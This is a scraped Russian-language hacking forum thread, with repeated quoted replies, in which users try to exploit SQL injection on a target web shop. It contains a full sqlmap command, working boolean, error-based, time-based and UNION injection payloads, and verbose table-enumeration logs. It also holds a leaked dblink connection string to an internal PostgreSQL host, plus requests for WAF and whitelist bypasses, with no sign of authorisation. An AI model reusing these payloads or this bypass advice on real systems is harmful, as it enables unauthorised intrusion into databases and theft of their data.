Пожалуйста, обратите внимание, что пользователь заблокирован
у sqlmap нет задачи видеть базы через ip... Это не порт сканнер.Тоесть sqlmap её не увидит?
у sqlmap нет задачи видеть базы через ip... Это не порт сканнер.Тоесть sqlmap её не увидит?
Если nmap не видит порты базаы данных, то получается и sql inj не получится сделать?у sqlmap нет задачи видеть базы через ip... Это не порт сканнер.
с чего это? База на другом хосте может быть.Если nmap не видит порты базаы данных, то получается и sql inj не получится сделать?
С этим я знаком, нетворк показывает пост запросы отправляются на тот сервер, который сканирую на нет мнёт портов для бдс чего это? База на другом хосте может быть.
Перед тем как ковырять это всё дело очень советую ознакомиться с базовыми навыками программирования бэкэнда.
И причем тут http запросы? Мы же про базу говорили, а не про запросыС этим я знаком, нетворк показывает пост запросы отправляются на тот сервер, который сканирую на нет мнёт портов для бд
Есть ложно положительные сработки(например со слепыми инъекциями), надо руками перепроверять. Все сканеры ошибатьсяВот у меня такой вопрос:Как часто сканер Burp suite может ошибаться при выводе сканирования?Вот я выявил пару потенциальных уязвимостей, несколько раз проверил. Выводит и всё...хоть ты убей одни и те жи. 1 это и наличие sql инъекции, а вторая рассинхронизация на стороне сервера, а вручную проверяю, хрен там чего... Или я не так че то делаю?
А вот как понять, вот интересно там есть настройки на срабатывания такие? Единственный вариант был перепроверить на calaboratore того же самого burp и то я ему яЕсть ложно положительные сработки(например со слепыми инъекциями), надо руками перепроверять. Все сканеры ошибаться
Ну покажи наглядно, что тебе нашел бурп, и что ты пихаешь в мап?А вот как понять, вот интересно там есть настройки на срабатывания такие? Единственный вариант был перепроверить на calaboratore того же самого burp и то я ему я
не очень доверяю теперь....ну или sqlmap, но там нету нужных параметров id и прочих для ввода, единственное там на кукисы грешит и вот этим можно будет проверить если. М мучаюсь какой день не могу раскрутить, скорее всего там нету ничего...
Ну покажи наглядно, что тебе нашел бурп, и что ты пихаешь в мап?
Я вкратце объяснил ситуацию, а вот тебя я не понял. Не надо коверкать меня!Беда беда... Покка обновлялся бёрп, я срать пошел. Смотрю, у 12го берпа дащборд новый. Смотрю - и в туалете катях какой то. Новый. Вывод? Бёрп говно.
Ты але, сформулируй вопрос правильно. Что, как, куда ты пихаешь. И зачем. какой резалт, кроме говна, ты хочешь получить.
Я хочу убедиться о наличии ошибки, а не ложного срабатывания, что-бы дальше её проексплуатировать и выявить результат.. Тебе так понятно?Беда беда... Покка обновлялся бёрп, я срать пошел. Смотрю, у 12го берпа дащборд новый. Смотрю - и в туалете катях какой то. Новый. Вывод? Бёрп говно.
Ты але, сформулируй вопрос правильно. Что, как, куда ты пихаешь. И зачем. какой резалт, кроме говна, ты хочешь получить.
SELECT * FROM public.dblink('hostaddr=10.67.*.* user=postgresuser* password=*** port=5002 dbname=*','select 0 AS ex FROM * WHERE * = ''webappuser@mail.com''') AS (ex int)
GET /index.php?с=* HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://target.com/index.php?с=' AND 4382=4382-- vMph
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
Payload: http://target.com/index.php?с=' AND UPDATEXML(4536,CONCAT(0x2e,0x7178627a71,(SELECT (ELT(4536=4536,1))),0x7171717071),3141)-- ijLI
Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://target.com/index.php?с=' AND (SELECT 7836 FROM (SELECT(SLEEP(10)))rjIn)-- utkS
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: http://target.com/index.php?с=-9915' UNION ALL SELECT CONCAT(0x7178627a71,0x79614f4d585a4466667155674446687665645a57754c4b6f794e7a444953617a52614a4b796e7361,0x7171717071),NULL-- -
Vector: UNION ALL SELECT [QUERY],NULL-- -
---
при -v 5 на все последние запросы ответ кодом 200[17:13:31] [INFO] the back-end DBMS is MySQL
[17:13:31] [PAYLOAD] -9402' UNION ALL SELECT CONCAT(0x7178627a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7171717071),NULL-- -
[17:13:33] [DEBUG] performed 1 query in 1.22 seconds
web server operating system: Linux Debian
web application technology: Apache 2.4.56
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[17:13:33] [INFO] fetching tables for database: 'shop_*_v3'
[17:13:33] [PAYLOAD] -4163' UNION ALL SELECT CONCAT(0x7178627a71,JSON_ARRAYAGG(CONCAT_WS(0x666c75626665,table_name)),0x7171717071),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:33] [PAYLOAD] -5806' UNION ALL SELECT CONCAT(0x7178627a71,COUNT(table_name),0x7171717071),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:33] [WARNING] the SQL query provided does not return any output
[17:13:33] [DEBUG] searching for error chunk length...
[17:13:33] [PAYLOAD] ' AND UPDATEXML(2044,CONCAT(0x2e,0x7178627a71,(SELECT REPEAT(0x34,1024)),0x7171717071),8243)-- KNiY
[17:13:33] [PAYLOAD] ' AND UPDATEXML(2456,CONCAT(0x2e,0x7178627a71,(SELECT REPEAT(0x39,19)),0x7171717071),9421)-- hhdJ
[17:13:33] [PAYLOAD] ' AND UPDATEXML(6010,CONCAT(0x2e,0x7178627a71,(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x73686f705f6d6974696c6c655f7633)),0x7171717071),9201)-- LYRg
[17:13:34] [WARNING] the SQL query provided does not return any output
[17:13:34] [PAYLOAD] -2467' UNION ALL SELECT CONCAT(0x7178627a71,JSON_ARRAYAGG(CONCAT_WS(0x666c75626665,table_name)),0x7171717071),NULL FROM mysql.innodb_table_stats WHERE database_name IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:34] [PAYLOAD] -5449' UNION ALL SELECT CONCAT(0x7178627a71,COUNT(table_name),0x7171717071),NULL FROM mysql.innodb_table_stats WHERE database_name IN (0x73686f705f6d6974696c6c655f7633)-- -
[17:13:34] [WARNING] the SQL query provided does not return any output
[17:13:34] [PAYLOAD] ' AND UPDATEXML(2875,CONCAT(0x2e,0x7178627a71,(SELECT COUNT(table_name) FROM mysql.innodb_table_stats WHERE database_name IN (0x73686f705f6d6974696c6c655f7633)),0x7171717071),5921)-- ZtAz
[17:13:34] [WARNING] the SQL query provided does not return any output
[17:13:34] [INFO] fetching number of tables for database 'shop_*_v3'
[17:13:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:13:34] [PAYLOAD] ' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73686f705f6d6974696c6c655f7633),1,1))>51-- KaXv
[17:13:34] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
[17:13:34] [PAYLOAD] ' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73686f705f6d6974696c6c655f7633),1,1))>48-- KaXv
[17:13:34] [PAYLOAD] ' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73686f705f6d6974696c6c655f7633),1,1))>9-- KaXv
[17:13:35] [INFO] retrieved:
[17:13:35] [DEBUG] performed 3 queries in 0.52 seconds
[17:13:35] [WARNING] unable to retrieve the number of tables for database 'shop_*_v3'
Через error-based есть же вывод на странице? Руками крути в браузере, там и причина понятна будет.Приветствую всех!посоветуйте как дальше действовать..акунетикс нашёл тайм-басед инъекцию,дальше запустил сканирования в sqlmap и он нашёл еще несколько + вытащил название бд.При попытках достать имена таблиц ничего не вышло,пейлоад sleep(5,10,15) от sqlmap через браузер отрабатывает нормально.
wafw00f - ничего не обнаружил,хотя sqlmap предупреждает про ваф
Предположим ваф что-то фильтрует ,подскажите как искать эти слова/символы для подбора тамперов? пытался подставить в рабочий пейлоад от sqlmap ,он ломался и была ошибка 'Warning. There was an unexpected database query!'
запрос мапу -> sqlmap -r /home/kali/Documents/*.txt --level=5 --risk=3 -D shop_*_v3 --random-agent --tables -v 5 --flush-session
Код:GET /index.php?с=* HTTP/1.1 Host: www.target.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Connection: close
найденные мапом уязвимости ->
Код:sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://target.com/index.php?с=' AND 4382=4382-- vMph Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) Payload: http://target.com/index.php?с=' AND UPDATEXML(4536,CONCAT(0x2e,0x7178627a71,(SELECT (ELT(4536=4536,1))),0x7171717071),3141)-- ijLI Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://target.com/index.php?с=' AND (SELECT 7836 FROM (SELECT(SLEEP(10)))rjIn)-- utkS Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: http://target.com/index.php?с=-9915' UNION ALL SELECT CONCAT(0x7178627a71,0x79614f4d585a4466667155674446687665645a57754c4b6f794e7a444953617a52614a4b796e7361,0x7171717071),NULL-- - Vector: UNION ALL SELECT [QUERY],NULL-- - ---
Вывод с проблемой отображения таблиц
при -v 5 на все последние запросы ответ кодом 200
Если открытого порта для СУБД нет, то снаружи ни как, кроме какого нибудь phpmyadmin, adminer и тому подобных инструментов торчащих наружу (например на других портах или директориях).После ручных манипуляций с формой вебсервер ответил данными с такой строкой
На удаленном IP все порты фильтруются, правильный вывод я сделал что доступ к удаленной БД по вайтлисту или что то подобное? Есть варианты обхода чтобы подключиться напрямую ?SQL:SELECT * FROM public.dblink('hostaddr=10.67.*.* user=postgresuser* password=*** port=5002 dbname=*','select 0 AS ex FROM * WHERE * = ''webappuser@mail.com''') AS (ex int)
буду пробовать ,спасибоЧерез error-based есть же вывод на странице? Руками крути в браузере, там и причина понятна будет.
Сталкивался с таким, сразу скажу, я не нашел обхода и кажется никто не найдет)) За подробностями пиши в PM.буду пробовать ,спасибо
начал крутить через браузер :
вывел версию->имя бд-> при попытке вывести таблицы перебирал всевозможные варианты и понял что скорее всего нагрузку ломает символ '_' нижнее подчеркивание , какие есть варианты для обхода\запаковки символа?